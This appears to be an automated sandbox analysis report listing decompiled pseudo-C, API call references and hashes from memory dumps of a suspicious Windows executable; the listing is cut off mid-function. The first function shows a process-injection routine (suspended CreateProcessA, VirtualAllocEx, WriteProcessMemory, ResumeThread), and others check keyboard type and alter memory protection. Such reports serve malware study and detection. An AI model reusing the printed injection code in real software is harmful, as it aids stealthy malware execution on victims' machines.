E035A48A8(CHAR* __eax, struct _SECURITY_ATTRIBUTES* __ecx, CHAR* __edx, intOrPtr _a4, struct _PROCESS_INFORMATION* _a8, struct _STARTUPINFOA* _a12, CHAR* _a16, void* _a20, signed int _a24, void* _a28, struct _SECURITY_ATTRIBUTES* _a32) { CHAR* _v8; CHAR* _v12; struct _SECURITY_ATTRIBUTES* _v16; void* __ebx; void* __edi; void* __esi; void* __ebp; int _t28; void* _t31; struct _PROCESS_INFORMATION* _t38; signed int _t39; void* _t43; _t35 = __ecx; _v16 = __ecx; _v12 = __edx; _v8 = __eax; _t38 = _a8; _t39 = _a24; _t34 = 0; _t23 = _t39 | 0x00000004; asm("cmc"); asm("sbb eax, eax"); _t28 = CreateProcessA(_v8, _v12, _v16, _a32, _t39 | 0x00000004, _t23, _a20, _a16, _a12, _t38); // executed if(_t28 != 0) { _t31 = E035A4794(_t38->hProcess, 0, _t35, _a4, _t38, _t39, _t43); // executed _t34 = _t31; if((_t39 & 0x00000004) == 0) { ResumeThread(_t38->hThread); } } return _t34; } 0x035a48a8 0x035a48b1 0x035a48b4 0x035a48b7 0x035a48ba 0x035a48bd 0x035a48c0 0x035a48d1 0x035a48d9 0x035a48da 0x035a48ed 0x035a48f4 0x035a48fb 0x035a4900 0x035a4908 0x035a490e 0x035a490e 0x035a4908 0x035a491b

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 035A48ED Part of subcall function 035A4794: VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,035A4894,?,?,?,00000000), ref: 035A47E8 Part of subcall function 035A4794: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040,00000000,035A4894,?,?,?,00000000), ref: 035A47FB Part of subcall function 035A4794: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040,00000000,035A4894,?,?), ref: 035A4815 Part of subcall function 035A4794: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040,00000000,035A4894,?,?,?,00000000), ref: 035A4857 ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 035A490E

Memory Dump Source

Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true

Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File

Similarity

API ID: Virtual$AllocProcess$CreateFreeMemoryResumeThreadWrite String ID: API String ID: 1551600056-0 Opcode ID: cddebfd46e960340c0a57e441cdf4bd4d4a4dd54064033c2b6274b5dbbf3529a Instruction ID: 81f7de3f47d20117d47ce813b91c5ac2dd543fbe6c38bfec548e092467fb1f64 Opcode Fuzzy Hash: cddebfd46e960340c0a57e441cdf4bd4d4a4dd54064033c2b6274b5dbbf3529a Instruction Fuzzy Hash: 3701D3B6A04219AFDB50DEADD880A9FB7FCAB48264F104165BA18E7310D770ED108BA0

Uniqueness

Uniqueness Score: -1.00%

APIs

LoadCursorA.USER32 ref: 004547A1 LoadCursorA.USER32 ref: 004547D0

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CursorLoad String ID: API String ID: 3238433803-0 Opcode ID: b46ed10e13b5891911fbcf58363eb243a181175a176f5a66f7bf3ab0bf39d95a Instruction ID: 5b92fd6cb82509c6b3023340ad8d3fa0ece0f32d952ca65a9c1d4e2f0fe40f81 Opcode Fuzzy Hash: b46ed10e13b5891911fbcf58363eb243a181175a176f5a66f7bf3ab0bf39d95a Instruction Fuzzy Hash: E3F08921B046441A9A20557E5CC0A7A72D4DBC773AF20033BFD39DF3D2D72D6C86415A

Uniqueness

Uniqueness Score: -1.00%

APIs

RegFlushKey.ADVAPI32(00000000,?,004239F4,?,?,00000000,00423BA0,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 00423999 RegCloseKey.ADVAPI32(00000000,?,004239F4,?,?,00000000,00423BA0,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004239A2

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFlush String ID: API String ID: 320916635-0 Opcode ID: 956964d0e594b963543663876903ecf3408bc7f3908dee6d6cb4c89ebefcd960 Instruction ID: 607071273b8a8f03ded242f4628478f4e142bd0fa1bf7c60492dcbfc477769d6 Opcode Fuzzy Hash: 956964d0e594b963543663876903ecf3408bc7f3908dee6d6cb4c89ebefcd960 Instruction Fuzzy Hash: 7CD012A17002008BCF50EF7AC5C47177BDC5B06315B44C4B7A809EF247D67CC4508B24

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0359356C() { int _t1; signed int _t4; int _t5; _t5 = 0; _t1 = GetKeyboardType(0); // executed if(_t1 == 7) { _t4 = GetKeyboardType(1) & 0x0000ff00; if(_t4 == 0xd00 || _t4 == 0x400) { _t5 = 1; } } return _t5; } 0x0359356d 0x03593571 0x03593579 0x03593582 0x0359358c 0x03593595 0x03593595 0x0359358c 0x0359359a

APIs

GetKeyboardType.USER32 ref: 03593571 GetKeyboardType.USER32 ref: 0359357D

Memory Dump Source

Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true

Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File

Similarity

API ID: KeyboardType String ID: API String ID: 1620330385-0 Opcode ID: 3abda0efe1a447a46643a35925134895fb0dc59df20db972b0bc10d38a8c27a4 Instruction ID: 61c34126dd18030c179a013f3a0724c16bafc373728c8923319f093158b38638 Opcode Fuzzy Hash: 3abda0efe1a447a46643a35925134895fb0dc59df20db972b0bc10d38a8c27a4 Instruction Fuzzy Hash: 6AD012DD64530299FF32E598E8C577DC714B75D31CF580873D208DC5F0D44598445412

Uniqueness

Uniqueness Score: -1.00%

APIs

RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,00423BB6), ref: 00423A88

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Open String ID: API String ID: 71445658-0 Opcode ID: 024347893320b92dfb4bad89f0ad8004936e86fda0b6909bc66a116ae120d134 Instruction ID: bbbba562cf4ef8ad2c766562c27961f1ed0d25de4a21f7584f0d3e043cf70339 Opcode Fuzzy Hash: 024347893320b92dfb4bad89f0ad8004936e86fda0b6909bc66a116ae120d134 Instruction Fuzzy Hash: 8821C230B04218AFDB11DEA5E952B9EB7F99B44304F5044BBB904E3282DB7DAF049608

Uniqueness

Uniqueness Score: -1.00%

APIs

CreateWindowExA.USER32 ref: 0040734B

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow String ID: API String ID: 716092398-0 Opcode ID: b58db20c084d251a18b2a55008c9825ef2296b69c151f418164321b74b5c3328 Instruction ID: b85b0cc3f2e5bc7e9d45a46899a2df812a80ae235cc29424d0f8592cef13ccd6 Opcode Fuzzy Hash: b58db20c084d251a18b2a55008c9825ef2296b69c151f418164321b74b5c3328 Instruction Fuzzy Hash: 3FF074B2705118BF9B40DE9DDC81D9B7BECEB4D264B054169FA08E3201D635ED1087A4

Uniqueness

Uniqueness Score: -1.00%

APIs

CreateWindowExA.USER32 ref: 0040734B

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow String ID: API String ID: 716092398-0 Opcode ID: af7131fd70f04d561484b010640c15216212988d875a779ef6235dcc54e20eb2 Instruction ID: e61e4b7de7878b32b5720a0b5ecd670a84b3b3b45b0905eabb5fb271e5fc7604 Opcode Fuzzy Hash: af7131fd70f04d561484b010640c15216212988d875a779ef6235dcc54e20eb2 Instruction Fuzzy Hash: 52F097B2605118BF9B40DE9DDC81DDF7BECEB4D264B054169FA0CE3201D635ED1087A4

Uniqueness

Uniqueness Score: -1.00%

APIs

CreateWindowExA.USER32 ref: 004073A1

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow String ID: API String ID: 716092398-0 Opcode ID: 624295222e5b5063965c5aa621892c6fe0a9898fd49347bfc06a69575b0ebae6 Instruction ID: 85808ded18d7c00b20e9529308029099665b44857ea87863c4fce7c96cc8d2ed Opcode Fuzzy Hash: 624295222e5b5063965c5aa621892c6fe0a9898fd49347bfc06a69575b0ebae6 Instruction Fuzzy Hash: A4F092B2605118BFDB80DE9EDC81E9B7BECEB4D265B00416AFA0CE7241D535ED1087A4

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 33%

E035A4E37(void* __eax, signed int __ebx, void* __ecx, signed char __edx, void* __esi, void* __eflags) { void* _t22; intOrPtr* _t23; signed int _t35; intOrPtr _t38; signed char _t42; intOrPtr _t44; intOrPtr _t45; signed int _t46; void* _t47; void* _t48; _t47 = __esi; _t42 = __edx; _t35 = __ebx; _t22 = __eax; asm("popad"); if(__eflags < 0) { *__eax = *__eax + __al; *__eax = *__eax + __al; __eflags = *__eax; } asm("adc [ecx+0x3], bl"); _t23 = _t22 - 1; *_t23 = *_t23 + _t23; *_t23 = *_t23 + _t23; asm("adc [ecx+0x3], bl"); _t19 = _t48 + 0x54; *_t19 = *(_t48 + 0x54) | _t42; __eflags = *_t19; _push(0x64616572); if( *_t19 >= 0) { goto L2; } else { asm("in eax, 0x5a"); goto [far dword [0x53000000]; } while(1) { L2: VirtualProtect(_t23 + *((intOrPtr*)(_t48 - 0xc)), ??, ??, ??); // executed _t35 = _t35 + 1; _t14 = _t48 - 0x38; *_t14 = *((intOrPtr*)(_t48 - 0x38)) - 1; if( *_t14 == 0) { break; } _push(_t48 - 0x34); _t46 = _t35 + _t35 * 4; _push(E035A4220( *((intOrPtr*)(_t47 + 0x24 + _t46 * 8)))); _push( *((intOrPtr*)(_t47 + 8 + _t46 * 8))); _t23 = *((intOrPtr*)(_t47 + 0xc + _t46 * 8)); } _t38 = *0x35a40a8; // 0x35a40ac E03595074( *((intOrPtr*)(_t48 + 8)), _t38, _t48 - 0x20); _pop(_t44); *[fs:eax] = _t44; _push(E035A4E21); _t45 = *0x35a40a8; // 0x35a40ac return E03594E10(_t48 - 0x20, _t45); goto L2; } 0x035a4e37 0x035a4e37 0x035a4e37 0x035a4e37 0x035a4e37 0x035a4e38 0x035a4e3a 0x035a4e3c 0x035a4e3c 0x035a4e3c 0x035a4e3e 0x035a4e41 0x035a4e42 0x035a4e44 0x035a4e46 0x035a4e49 0x035a4e49 0x035a4e49 0x035a4e4c 0x035a4e51 0x00000000 0x035a4e53 0x035a4e57 0x035a4e5f 0x035a4e5f 0x035a4dde 0x035a4dde 0x035a4de2 0x035a4de7 0x035a4de8 0x035a4de8 0x035a4deb 0x00000000 0x00000000 0x035a4dc7 0x035a4dc8 0x035a4dd4 0x035a4dd9 0x035a4dda 0x035a4dda 0x035a4df3 0x035a4df9 0x035a4e00 0x035a4e03 0x035a4e06 0x035a4e0e 0x035a4e19 0x00000000

Memory Dump Source

Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true

Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 240d5bb4fa8c043b02a31812011fc8d23fdeef24393895d2d085469ab3073ddb Instruction ID: c1fad2c88b951ef2c4069e01bfa5e0ec8124dd0bdb9957053ba5aea381d42e0e Opcode Fuzzy Hash: 240d5bb4fa8c043b02a31812011fc8d23fdeef24393895d2d085469ab3073ddb Instruction Fuzzy Hash: EA01F47540A7849FCF07D7E5FD5099C7B75FB42210B1A44D6D0049E272C2785C0AEB11

Uniqueness

Uniqueness Score: -1.00%

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00405C3A Part of subcall function 00405E80: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00400000,00461790), ref: 00405E9C Part of subcall function 00405E80: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405EBA Part of subcall function 00405E80: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405ED8 Part of subcall function 00405E80: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405EF6 Part of subcall function 00405E80: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405F3F Part of subcall function 00405E80: RegQueryValueExA.ADVAPI32(?,004060EC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001), ref: 00405F5D Part of subcall function 00405E80: RegCloseKey.ADVAPI32(?,00405F8C,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405F7F

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Open$FileModuleNameQueryValue$Close String ID: API String ID: 2796650324-0 Opcode ID: bc21d5101fc51bdf4626e6ca00cb4df6505cc7613c57e159f19c307d06cb48aa Instruction ID: 1b0a8c2aa0dbabf6a82ae7d2e2fcdd13184de0ac0e476d2ee2bc6056b14444b1 Opcode Fuzzy Hash: bc21d5101fc51bdf4626e6ca00cb4df6505cc7613c57e159f19c307d06cb48aa Instruction Fuzzy Hash: 9BE06D71A007108FDB10EE98C8C5A9333D8EB08754F0005A6ED98EF386D374DD908BD4

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E03595520(void* __eax) { char _v272; intOrPtr _t14; void* _t16; intOrPtr _t18; CHAR* _t19; _t16 = __eax; if( *((intOrPtr*)(__eax + 0x10)) == 0) { _t3 = _t16 + 4; // 0x3590000 GetModuleFileNameA( *_t3, &_v272, 0x105); _t14 = E03595784(_t19); // executed _t18 = _t14; *((intOrPtr*)(_t16 + 0x10)) = _t18; if(_t18 == 0) { _t5 = _t16 + 4; // 0x3590000 *((intOrPtr*)(_t16 + 0x10)) = *_t5; } } _t7 = _t16 + 0x10; // 0x3590000 return *_t7; } 0x03595528 0x0359552e 0x0359553a 0x0359553e 0x03595547 0x0359554c 0x0359554e 0x03595553 0x03595555 0x03595558 0x03595558 0x03595553 0x0359555b 0x03595566

APIs

GetModuleFileNameA.KERNEL32(03590000,?,00000105), ref: 0359553E Part of subcall function 03595784: GetModuleFileNameA.KERNEL32(00000000,?,00000105,03590000,035A8790), ref: 035957A0 Part of subcall function 03595784: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,03590000,035A8790), ref: 035957BE Part of subcall function 03595784: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,03590000,035A8790), ref: 035957DC Part of subcall function 03595784: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 035957FA Part of subcall function 03595784: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,03595889,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 03595843 Part of subcall function 03595784: RegQueryValueExA.ADVAPI32(?,035959F0,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,03595889,?,80000001), ref: 03595861 Part of subcall function 03595784: RegCloseKey.ADVAPI32(?,03595890,00000000,?,?,00000000,03595889,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03595883

Memory Dump Source

Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true

Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File

Similarity

API ID: Open$FileModuleNameQueryValue$Close String ID: API String ID: 2796650324-0 Opcode ID: 869449d0d2f28efb40d020fa3a329847918f88d1a01f403c69ed6433847cf695 Instruction ID: 33b58cfe1f68e91735ad2df7e97a0f42bc1219bae12cf5ea9c075851ed905bf8 Opcode Fuzzy Hash: 869449d0d2f28efb40d020fa3a329847918f88d1a01f403c69ed6433847cf695 Instruction Fuzzy Hash: 9AE06D75A003119FDF10DE5CD8C4A4633E8BB09664F040992ED58CF246E3B0DA2087D0

Uniqueness

Uniqueness Score: -1.00%

APIs

DefWindowProcA.USER32(?,?,?,?), ref: 00455FDE

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: ProcWindow String ID: API String ID: 181713994-0 Opcode ID: feadc97ff837b75b266de6139b99dc6f72c8cfb3ed8b0667b2d15d3104d4f2d8 Instruction ID: a24cf2be33493bd3f548c5cb2912f0d98b4921db6f5013c36e2596895fdb8764 Opcode Fuzzy Hash: feadc97ff837b75b266de6139b99dc6f72c8cfb3ed8b0667b2d15d3104d4f2d8 Instruction Fuzzy Hash: 5DF0C579205608AFCB40DF9DC588D4AFBE9BB4C760B058195B988CB321C234FD80CF90

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E03597B68(void* __eax) { signed char _t5; _t5 = GetFileAttributesA(E035947DC(__eax)); // executed if(_t5 == 0xffffffff || (_t5 & 0x00000010) != 0) { return 0; } else { return 1; } } 0x03597b73 0x03597b7b 0x03597b84 0x03597b85 0x03597b88 0x03597b88

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,035A6B13,035A4E54,00000008,00000040,00000000,00000000,DllRegisterServer,035A4E54,00000008,00000040,00000000,00000000,CryptSIPVerifyIndirectData,035A4E54), ref: 03597B73

Memory Dump Source

Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true

Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File

Similarity

API ID: AttributesFile String ID: API String ID: 3188754299-0 Opcode ID: c15bba489eecb7c30a673aa07caeef76b2291a5700813f344973d9c2e1ce2c75 Instruction ID: 892c99690383e696628de7d7afbe658acea712d817fac0f286eea093f3ea36a2 Opcode Fuzzy Hash: c15bba489eecb7c30a673aa07caeef76b2291a5700813f344973d9c2e1ce2c75 Instruction Fuzzy Hash: 6DC08CA52223010ABE50F2FC3CC408A4298298D035B2C0F23A02CC76F2E229842B2010

Uniqueness

Uniqueness Score: -1.00%

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00421742

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual String ID: API String ID: 4275171209-0 Opcode ID: 89e6221551a74eb15f9e48ced21239ad1d285c4e27d512bd12529dafe54f9687 Instruction ID: 827c15edd165ef37d5224862c0752f9a577ccbf913505635d27218b0d4be8635 Opcode Fuzzy Hash: 89e6221551a74eb15f9e48ced21239ad1d285c4e27d512bd12529dafe54f9687 Instruction Fuzzy Hash: EC1148782403159FC710DF19D880B42B7E5EB98790F24C53AE9598B396E3B4E9058BA9

Uniqueness

Uniqueness Score: -1.00%

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,00401AFF,?,004020BD), ref: 004016DE

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual String ID: API String ID: 4275171209-0 Opcode ID: 529b24f2eb1d7a78af4946a119c865930d0c7bde26a066f6f9e42cf2a5f2b5b0 Instruction ID: 2b17dd7dffbc5f012c9b03bba10325585f0ff40c38224672d8caf756a086162d Opcode Fuzzy Hash: 529b24f2eb1d7a78af4946a119c865930d0c7bde26a066f6f9e42cf2a5f2b5b0 Instruction Fuzzy Hash: C0F037F0B013405BEB09DFBA9D513026AD2E78934AF14C13AE609EB3A8F7B585018B18

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E035915BC(signed int __eax) { void* _t4; intOrPtr _t7; signed int _t8; void* _t10; void** _t15; void* _t17; _t8 = __eax; L03591550(__eax); _t4 = VirtualAlloc(0, 0x140000, 0x1000, 4); // executed if(_t4 == 0) { *0x35aa718 = 0; return 0; } else { _t15 = *0x35aa704; // 0x3720000 _t10 = _t4; *_t10 = 0x35aa700; *0x35aa704 = _t4; *(_t10 + 4) = _t15; *_t15 = _t4; _t17 = _t4 + 0x140000; *((intOrPtr*)(_t17 - 4)) = 2; *0x35aa718 = 0x13fff0 - _t8; _t7 = _t17 - _t8; *0x35aa714 = _t7; *(_t7 - 4) = _t8 | 0x00000002; return _t7; } } 0x035915bd 0x035915bf 0x035915d2 0x035915d9 0x0359162a 0x03591632 0x035915db 0x035915db 0x035915e1 0x035915e3 0x035915e9 0x035915ee 0x035915f1 0x035915f5 0x03591600 0x0359160d 0x03591615 0x03591617 0x03591624 0x03591627 0x03591627

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,035919F3), ref: 035915D2

Memory Dump Source

Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true

Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File

Similarity

API ID: AllocVirtual String ID: API String ID: 4275171209-0 Opcode ID: ccf99e2467cc84680d9c832f883459c5cfe3cae67b5cd4f329e4291dae2cb102 Instruction ID: f7f98cad43596db549e8f0a69bf42b62a76465e0271b80a5335698a83bb26574 Opcode Fuzzy Hash: ccf99e2467cc84680d9c832f883459c5cfe3cae67b5cd4f329e4291dae2cb102 Instruction Fuzzy Hash: 20F0FFF0B017014FEB45EF79E9807167AE2F789245F248079D605DB3A8E6758506E740

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 63%

E03593FF8(intOrPtr __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) { void* _t27; char _t32; signed int _t33; signed int _t34; int _t42; void* _t55; intOrPtr _t60; void _t66; intOrPtr* _t67; intOrPtr* _t68; void* _t69; intOrPtr _t72; struct HINSTANCE__* _t87; intOrPtr _t89; intOrPtr _t90; void* _t91; void* _t92; _t72 = __edx; _t60 = __ebx; _t27 = memcpy(_t89 - 0x3c, 0x35ac7c0, 0xb << 2); _t92 = _t91 + 0xc; _pop( *0x35ac7e0); _pop( *0x35ac7dc); *0x35ac7d4 = _t89; *0x35ac7d8 = __ebx; *0x35ac7c8 = _t27; *0x35ac7d0 = _t72; *0x35ac7c0 = _t89 - 0x3c; _t66 = 0; if( *(_t89 + 0xc) == 0) { _t66 = *_t27; } *0x35ac7cc = _t66; *0x35aa014 = 0x3591168; *0x35aa018 = 0x3591170; L03593EE4(); _t32 = *(_t89 + 0xc) + 1; *0x35ac7e8 = _t32; _t33 = _t32 - 1; _pop(_t67); *0x35ac7e4 = *_t67; if(_t33 != 0 && _t33 < 3) { *((intOrPtr*)(_t67 + _t33 * 4))(); } _push(_t67); _t68 = *((intOrPtr*)(_t92 + 8)); if(_t68 != 0) { *_t68(); } _pop(_t69); _t34 = *(_t89 + 0xc); if(_t34 >= 3) { *((intOrPtr*)(_t69 + _t34 * 4))(); } if( *0x35aa02c == 0) { *0x35aa034 = 1; asm("fnstcw word [0x35a8024]"); } if( *(_t89 + 0xc) != 1) { _push(_t60); _push(0x35ac7c0); _push(0x35ac7d6); _push(_t89); if( *0x035AC7E8 != 0 || *0x35aa040 == 0) { L16: if( *0x35a8004 != 0) { E03594128(); E035941BC(_t69); *0x35a8004 = 0; } L18: if( *((char*)(0x35ac7e8)) == 2 && *0x35a8000 == 0) { *0x035AC7CC = 0; } L03593F2C(); if( *((char*)(0x35ac7e8)) <= 1 || *0x35a8000 != 0) { _t80 = *0x035AC7D0; if( *0x035AC7D0 != 0) { L03595AF4(_t80); _t90 = *((intOrPtr*)(0x35ac7d0)); _t21 = _t90 + 0x10; // 0x3590000 _t87 = *_t21; _t22 = _t90 + 4; // 0x3590000 if(_t87 != *_t22 && _t87 != 0) { FreeLibrary(_t87); } } } L03593F04(); if( *((char*)(0x35ac7e8)) == 1) { *0x035AC7E4(); } if( *((char*)(0x35ac7e8)) != 0) { E0359418C(); } if( *0x35ac7c0 == 0) { if( *0x35aa024 != 0) { *0x35aa024(); } _t42 = *0x35a8000; // 0x0 ExitProcess(_t42); } memcpy(0x35ac7c0, *0x35ac7c0, 0xb << 2); _t92 = _t92 + 0xc; goto L18; } else { do { *0x35aa040 = 0; *((intOrPtr*)( *0x35aa040))(); } while ( *0x35aa040 != 0); goto L16; } } else { _t55 = E03593F90(); // executed return _t55; } } 0x03593ff8 0x03593ff8 0x03594008 0x03594008 0x0359400a 0x03594010 0x03594016 0x0359401c 0x03594022 0x03594027 0x03594030 0x03594036 0x0359403c 0x0359403e 0x0359403e 0x03594040 0x0359404b 0x03594055 0x0359405a 0x03594062 0x03594063 0x03594068 0x03594069 0x0359406c 0x03594072 0x03594078 0x03594078 0x0359407b 0x0359407c 0x03594082 0x0359408a 0x0359408a 0x0359408c 0x0359408d 0x03594092 0x03594094 0x03594094 0x0359409e 0x035940a0 0x035940a7 0x035940a7 0x035940b1 0x03594248 0x03594249 0x0359424a 0x0359424b 0x0359425a 0x03594270 0x03594277 0x03594279 0x0359427e 0x03594285 0x03594285 0x0359428a 0x0359428e 0x0359429b 0x0359429b 